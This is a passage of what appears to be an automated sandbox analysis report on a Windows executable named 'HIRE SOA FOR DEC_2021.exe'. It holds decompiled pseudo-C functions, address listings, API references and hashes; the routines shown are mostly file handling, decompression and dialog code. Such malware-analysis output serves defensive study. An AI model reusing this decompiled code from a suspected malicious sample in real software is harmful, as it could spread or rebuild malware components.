											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x00406355
0x00406355
0x00406359
0x00406382
0x0040638c
0x0040635b
0x00406364
0x00406371
0x00406374
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00406709
0x0040670d
0x004068bc
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x004068ea
0x004068ee
0x004068ee
0x00406719
0x00406720
0x00406728
0x0040672b
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00405ed0
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x004066b8
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040604c
0x0040604e
0x00406051
0x004060c2
0x004060c5
0x004060c8
0x004060cf
0x004060d9
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406053
0x00406057
0x0040605a
0x0040605c
0x0040605f
0x00406062
0x00406064
0x00406067
0x00406069
0x0040606e
0x00406071
0x00406074
0x00406078
0x0040607f
0x00406082
0x00406089
0x0040608d
0x00406095
0x00406095
0x00406095
0x0040608f
0x0040608f
0x0040608f
0x00406084
0x00406084
0x00406084
0x00406099
0x0040609c
0x004060ba
0x004060bc
0x00000000
0x0040609e
0x0040609e
0x004060a1
0x004060a4
0x004060a7
0x004060a9
0x004060a9
0x004060a9
0x004060ac
0x004060af
0x004060b1
0x004060b2
0x004060b5
0x00000000
0x004060b5
0x00000000
0x004062eb
0x004062ef
0x0040630d
0x00406310
0x00406317
0x0040631a
0x0040631d
0x00406320
0x00406323
0x00406326
0x00406328
0x0040632f
0x00406330
0x00406332
0x00406335
0x00406338
0x0040633b
0x0040633b
0x00406340
0x00000000
0x00406340
0x004062f1
0x004062f4
0x004062f7
0x00406301
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00000000
0x00000000
0x00406398
0x0040639c
0x00000000
0x00000000
0x004063a2
0x004063a6
0x00000000
0x00000000
0x004063ac
0x004063ae
0x004063b2
0x004063b2
0x004063b5
0x004063b9
0x00000000
0x00000000
0x00406409
0x0040640d
0x00406414
0x00406417
0x0040641a
0x00406424
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x0040640f
0x00000000
0x00000000
0x00406430
0x00406434
0x0040643b
0x0040643e
0x00406441
0x00406436
0x00406436
0x00406436
0x00406444
0x00406447
0x0040644a
0x0040644a
0x0040644d
0x00406450
0x00406453
0x00406453
0x00406456
0x0040645d
0x00406462
0x00000000
0x00000000
0x004064f0
0x004064f0
0x004064f4
0x00406892
0x00000000
0x00406892
0x004064fa
0x004064fd
0x00406500
0x00406504
0x00406507
0x0040650d
0x0040650f
0x0040650f
0x0040650f
0x00406512
0x00406515
0x00000000
0x00000000
0x004060e5
0x004060e5
0x004060e9
0x00406856
0x00000000
0x00406856
0x004060ef
0x004060f2
0x004060f5
0x004060f9
0x004060fc
0x00406102
0x00406104
0x00406104
0x00406104
0x00406107
0x0040610a
0x0040610a
0x0040610d
0x00406110
0x00000000
0x00000000
0x00406116
0x0040611c
0x00000000
0x00000000
0x00406122
0x00406122
0x00406126
0x00406129
0x0040612c
0x0040612f
0x00406132
0x00406133
0x00406136
0x00406138
0x0040613e
0x00406141
0x00406144
0x00406147
0x0040614a
0x0040614d
0x00406150
0x0040616c
0x0040616f
0x00406172
0x00406175
0x0040617c
0x00406180
0x00406182
0x00406186
0x00406152
0x00406152
0x00406156
0x0040615e
0x00406163
0x00406165
0x00406167
0x00406167
0x00406189
0x00406190
0x00406193
0x00000000
0x00406199
0x00000000
0x00406199
0x00000000
0x0040619e
0x0040619e
0x004061a2
0x00406862
0x00000000
0x00406862
0x004061a8
0x004061ab
0x004061ae
0x004061b2
0x004061b5
0x004061bb
0x004061bd
0x004061bd
0x004061bd
0x004061c0
0x004061c3
0x004061c3
0x004061c3
0x004061c9
0x00000000
0x00000000
0x004061cb
0x004061ce
0x004061d1
0x004061d4
0x004061d7
0x004061da
0x004061dd
0x004061e0
0x004061e3
0x004061e6
0x004061e9
0x00406201
0x00406204
0x00406207
0x0040620a
0x0040620a
0x0040620d
0x00406211
0x00406213
0x004061eb
0x004061eb
0x004061f3
0x004061f8
0x004061fa
0x004061fc
0x004061fc
0x00406216
0x0040621d
0x00406220
0x00000000
0x00406222
0x00000000
0x00406222
0x00406220
0x00406227
0x00406227
0x00406227
0x00406227
0x00000000
0x00000000
0x00406262
0x00406262
0x00406266
0x0040686e
0x00000000
0x0040686e
0x0040626c
0x0040626f
0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00406734
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x0040673a
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004066bb
0x004066b8

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423ed0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C

Uniqueness

Uniqueness Score: -1.00%

Function 0040575C Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040575C(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405760
0x0040576d
0x00405782
0x00405788

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe,80000000,00000003), ref: 00405760
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16

Uniqueness

Uniqueness Score: -1.00%

Function 0040573D Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040573D(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}

0x00405741
0x0040574a
0x00000000
0x00405753
0x00405759

APIs

GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A

Uniqueness

Uniqueness Score: -1.00%

Function 004031A8 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031A8(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x004031ac
0x004031bf
0x004031c7
0x00000000
0x004031ce
0x00000000
0x004031d0

APIs

ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004031DA Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031DA(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}

0x004031e8
0x004031ee

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404F61 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t112;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x420498;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42366c == _t149) {
							ShowWindow( *0x423ea8, 8);
							if( *0x423f2c == _t149) {
								_t112 =  *0x41fc68; // 0x0
								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
							}
							E00403E10(1);
							goto L25;
						}
						 *0x41f860 = 2;
						E00403E10(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403E9E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403E6C(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0;
